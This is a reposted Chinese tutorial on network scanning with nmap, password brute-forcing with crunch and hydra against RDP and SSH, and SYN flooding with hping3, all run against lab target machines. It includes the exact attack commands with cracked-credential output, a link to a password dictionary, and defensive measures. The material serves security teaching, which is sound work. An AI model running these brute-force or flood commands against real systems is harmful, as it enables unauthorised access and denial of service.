密码暴力破解、渗透测试流程

这篇具有很好参考价值的文章主要介绍了密码暴力破解、渗透测试流程。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

信息收集

1、扫描的价值
对攻击者来说:根据扫描结果,来决定进一步的攻击行动;
能够更有针对性地选择攻击方法、攻击工具,节省攻击时间

对防护者来说:根据扫描结果,判断应采取什么样的安全策略;
封堵漏洞、加固系统、完善访问控制

2、nmap

Network Mapper,一款开源的网络探测器

-采用原始报文方式,可以快速扫描单个主机或大型网络

-识别目标的服务类型、程序版本、防火墙等

1)nmap 命令格式

nmap  [扫描类型]  [选项]  <扫描目标>


2)指定扫描类型

  -sS:TCP半开扫描(只发SYN包,不会产生会话日志),速度快

  -sT:TCP全开扫描(尝试全连接),结果更准确

  -sU:UDP扫描

  -sP:使用ICMP扫描,仅用于探测目标是否在线

  -O  扫描操作系统

  -sV 扫描端口对应的服务版本

3)指定目标端口

  -p  3389  :扫描指定接口

  -p  20-80 :扫描连续的接口

  -p  22,80 :扫描多个指定接口

4)端口状态

  open  : 开放的

  filtered  :探测报文被目标服务器的防火墙过滤和阻止了

  closed :关闭的

  探测逻辑
1、探测存活的主机:nmap -sP  192.168.10.0/24; nmap -sS  192.168.10.0/24
2、探测目标主机的端口号:nmap -sS -p 端口列表 主机列表
3、探测目标主机端口对应的软件信息:nmap -sV -p 端口  主机
4、探测目标主机操作系统信息:nmap -O 主机
5、进一步攻击:密码爆破、漏洞利用、拒绝服务攻击

密码暴力破解

1、什么是暴力破解

    密码破解指攻击者猜解目标密码或用户名的攻击行为
暴力破解,也称为“密码穷举”,列出各种可能的密码,用来尝试去访问目标系统,理论上任何密码都可以用这种方法来破解,不过越复杂的密码破解耗时也越长
字典破解,实施破解时采用“可能”的密码,比如生日、单词、常用数字,可手动或通过工具编写,也可以通过分享获取社工密码库(最常见的密码是“password”、“123456”、“123456789”)

    [全球最常用的密码名单公布:“password”“123456”前二 (baidu.com)]

    测试密码有多安全?
[https://www.security.org/how-secure-is-my-password/]

(https://www.security.org/how-secure-is-my-password/)
 

2、crunch密码字典工具
基本用法:crunch     最小长度     最大长度    素材字符

示例1:crunch  6   6   0123456789    //随机组成6位纯数字密码

示例2:crunch  6   8    Abc1234    //由Abc1234随机组成的6~8位密码

示例3:crunch  8   8   -t  A%%     -o  pass.txt  // 以A开头2位数字组成的3位密码,保存为pass.txt文件
 

  特殊匹配字符:
@   --> 代表小写字母
,     --> 代表大写字母
%   --> 代表数字
^     --> 代表标点及特殊字符

  十八年窖藏的密码字典
[https://wwi.lanzoup.com/ivqUz0phft5c](https://wwi.lanzoup.com/ivqUz0phft5c)

3、hydra暴力破解
hydra:海德拉,一款功能强大的开源密码攻击工具,支持多种协议的破解

格式:hydra  [选项]   目标地址  服务类型

 -l 指定用户名

 -L 指定用户名字典文件

 -P 指定密码字典文件

 -o 将结果输出到指定文件

 -v 显示破解过程

 -t 同时执行的任务数,默认16个

示例1:破解windows靶机远程桌面密码

第一步:生成密码字典

┌──(root💀kali)-[~]

└─# crunch  7   7   -t  pwd%%%%   -o  p1.txt    //产生开头pwd后面4位数字的长度7位密码

第二步:执行暴力破解(使用RDP-3389进行爆破)

┌──(root💀kali)-[~]

└─# hydra  -l  Administrator  -P  p1.txt  192.168.10.145  rdp

[DATA] attacking rdp://192.168.10.145:3389/

[3389][rdp] host: 192.168.10.145   login: Administrator   password: pwd1234

第三步:在kali系统中远程登录windows-2008

┌──(root💀kali)-[~]

└─# rdesktop   192.168.10.145

输入: yes


示例2:破解Linux靶机SSH登录密码

第一步:编写密码字典

┌──(root💀kali)-[~]

└─# vim  pass.list

第二步:执行暴力破解

┌──(root💀kali)-[~]

└─# hydra  -l  msfadmin  -P  pass.list  192.168.10.143  ssh  -t 4      //同时4个任务

[22][ssh] host: 192.168.10.143  login: msfadmin  password: msfadmin
 

  爆破ssh密码时可能因对方SSH配置,需要限制破解任务数量 -t 4

  第三步:在kali系统中,远程另外一台kali 主机

  ┌──(root💀kali)-[~]

  └─# ssh    msfadmin@192.168.10.143

4、防暴破
1)设置黑客想不到的(防字典破解),设置够长够复杂的(防暴力破解),定期修改密码,不要用老密码

2)禁用管理员账号或改名,如:Administrator、root

3)做系统加固,设置登录次数限制、启用账户锁定阈值(针对普通用户)

4)修改端口号

5)指定哪些IP地址可以远程连接到本电脑
 

拒绝服务

1、什么是拒绝服务:

    通过各种手段,最终导致目标系统崩溃、失去响应,从而使目标系统不能为正常的用户提供资源或对应的功能(拒绝服务)

    常见的DoS攻击方式:

      SYN Flood泛洪

      Ping Flood泛洪

      UDP Flood泛洪

2、hping3测试工具

    可向目标主机发送任意TCP/IP协议数据包的一款开源的安全工具,也用于扫描/防火墙测试/路由追踪/协议分析等场景

    格式: hping3  主机  [选项]

    常用选项:

      --syn:设置SYN标记(-S)

      -p:指定目标端口

      -a:伪造源地址欺骗

      -d:  指定数据包的大小

      --flood:泛洪,尽最快发送数据包,不显示回复

      --rand-source:随机源地址模式

3、DoS攻击案例

  测试机:kali,使用hping3工具

  靶机:windows靶机,开启3389远程桌面服务

  场景演示:针对靶机的3389端口发起攻击,使其失去响应

  

  第一步:正常访问Windows靶机远程桌面

  第二步:kali 主机对windows靶机发起攻击

  ┌──(root💀kali)-[~]

  └─# hping3  192.168.10.145 --syn --flood -p 3389

  HPING 192.168.10.145 (eth0 192.168.10.145): S set, 40 headers + 0 data bytes

  hping in flood mode, no replies will be shown

  //需要停止时,按Ctrl + C快捷键

  

  第三步:验证:在攻击过程中,远程windows-2008,发现无法连接远程

  第四步:再次验证

  备注:停止攻击,稍等1分钟,可以正常远程

  

4、DDoS,分布式拒绝服务( Distributed Denial of Service)

  1)什么是分布式拒绝服务:

    一种典型的流量攻击,放大版的DoS攻击,攻击方的主机数量呈现规模化;

    通常由分布在不同网络、不同位置的成千上万的主机组成攻击方(通常称为botnet僵尸网络),被同一发起者所控制,攻击强度更大,防御的难度也更大。

  

  2)如何防御DoS/DDoS攻击:

    1)提高服务方的交付能力

      减少服务配置的等待时间

      优化单一客户机的并发响应策略

      更换高性能设备

      增加网络带宽

      负载均衡架构

      部署CDN内容分发网络

    2)部署专用软硬件防御产品

      冰盾防火墙

      流量清洗、 DDoS高防IP

      IDS入侵检测设备

      抗DDoS专用防火墙设备

      识别源IP,植入黑名单

渗透测试流程

 1、渗透测试是什么

  -是一种通过模拟攻击的技术与方法,打破目标系统的安全防御,并获得目标系统控制访问权的安全测试方法.

2、渗透测试的目标分类

  -针对主机操作系统渗透:Windows、Linux···

  -针对数据库系统渗透:MySQL、MS-SQL···

  -针对应用系统渗透:PHP组成的网站···

  -针对网络设备渗透:防火墙、路由器、交换机···

 3、渗透测试的7个阶段

    1)前期交互

    2)信息收集

    3)威胁建模

    4)漏洞分析

    5)渗透攻击

    6)后渗透攻击

    7)渗透报告文章来源地址https://www.toymoban.com/news/detail-474553.html

到了这里,关于密码暴力破解、渗透测试流程的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包赞助服务器费用

相关文章

  • Kali渗透测试:散列密码破解

    Kali渗透测试:散列密码破解

    某些网站的安全机制设置有缺陷,导致自身的关键数据库被渗透。很多用户在不同网站使用的是相同的用户名和密码,因此黑客可以通过获取通过获取用户在A网站的用户名和密码从而尝试登录B网站,这就是“撞库攻击”。 如2014年12月25日开始在互联网上“疯传的”12306网站用

    2024年02月05日
    浏览(8)
  • 渗透测试--5.3.使用john破解密码

    渗透测试--5.3.使用john破解密码

    由于Linux是Internet最流行的服务器操作系统,因此它的安全性备受关注。这种安全主要靠口令实现。 Linux使用一个单向函数crypt()来加密用户口令。单向函数crypt()从数学原理上保证了从加密的密文得到加密前的明文是不可能的或是非常困难的。当用户登录系统时,系统并

    2024年02月13日
    浏览(6)
  • python暴力破解压缩包密码(python暴力破解zip压缩包)

    python暴力破解压缩包密码(python暴力破解zip压缩包)

    简介 : ZIP文件格式是一种数据压缩和文档储存的文件格式,原名Deflate,发明者为菲尔·卡茨(Phil Katz),他于1989年1月公布了该格式的资料。ZIP通常使用后缀名“.zip”,它的MIME格式为application/zip。当前,ZIP格式属于几种主流的压缩格式之一,其竞争者包括RAR格式以及开放源

    2024年02月03日
    浏览(9)
  • 利用暴力攻击破解登陆密码

    利用暴力攻击破解登陆密码

    长久以来,入侵远程计算机系统的工具和技术并没有发生翻天覆地的变化。例如,在许多情况下,普通用户只要知道了相关密码,就能立刻变身为管理员。虽然这些情形听起来不够曲折,但在大多数情况下,暴力攻击是通过利用密码管理缺陷来入侵系统的最简单实用的方法。

    2024年02月05日
    浏览(12)
  • 暴力破解WiFi密码

    暴力破解WiFi密码

    所需要的设备及软件 : 一个可支持监听功能的无线网卡 VMware Workstation 15 Pro(这里版本是15.1,之前用15.5在插入网卡时没有反应) kali系统 步骤: 将无线网卡插入USB口,将其连接到虚拟机里 连接后多等一会,等到可以查看到附近wifi 如果搜索不到附近WiFi断开连接后在重新连

    2024年02月11日
    浏览(7)
  • CTF-Show密码学:ZIP文件密码破解【暴力破解】

    CTF-Show密码学:ZIP文件密码破解【暴力破解】

    萌新 隐写23 题目内容: 文件的主人喜欢用生日做密码,而且还是个90后。 在这个题目中,我们有以下已知条件: 文件的主人喜欢用生日做密码 - 这个条件告诉我们,密码可能是一个八位的纯数字密码,因为大多数人的生日在公历中都可以用八位数字表示(例如,19901231表示

    2024年02月10日
    浏览(11)
  • Burp Suite暴力破解网站密码

    Burp Suite暴力破解网站密码

    注:任何未经授权的渗透测试皆为违法,本文仅供学习,维护网络安全人人有责。 一、打开dvwa暴力破解页面: 二,随便输入用户名和密码: 返回:“用户名或密码错误”,这里有个小技巧,有的网站会返回“用户名不存在”和“密码错误”,也就是说用户名输入错误时和密

    2024年02月11日
    浏览(12)
  • 网安实训(八)| Hashcat 进行密码暴力破解

    网安实训(八)| Hashcat 进行密码暴力破解

    目录 一、实验目的 二、实验过程 步骤一:创建一个压缩包并对其加密 步骤二:将压缩包存放至Kali虚拟机中 步骤三:使用john查看hash值 步骤四:把hash值写入txt文件 步骤五:用字典破解 步骤六:获取到md5码对应的密码(“123”即为获取到的密码) 三、实验效果 ① 压缩文件

    2024年02月07日
    浏览(12)
  • Python暴力破解附近局域网WiFi密码

    Python暴力破解附近局域网WiFi密码

    本文将记录学习下如何通过 Python 脚本实现 WIFI 密码的暴力破解,从而实现免费蹭网。 先来看看没有图形界面版的爆破脚本。 代码运行效果: 以上脚本需内嵌 WIFI 名、爆破字典路径,缺少灵活性。下面进行改造优化:​​​​​​​   脚本运行效果如下: 上述代码实现了依

    2024年02月11日
    浏览(15)
  • 使用python暴力破解zip压缩包的密码

    使用python暴力破解zip压缩包的密码

    如果你有压缩包的密码忘记了,并且压缩包的加密算法采用的是ZipCrypto,并且压缩参数如下图所示: 那么你就可以使用本文中的方法进行破解。 压缩包的加密,是根据输入的密码进行运算加密,输入不同的密码,加密后的结果就是不同的二进制流。所以在进行解密的时候,

    2024年01月21日
    浏览(7)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包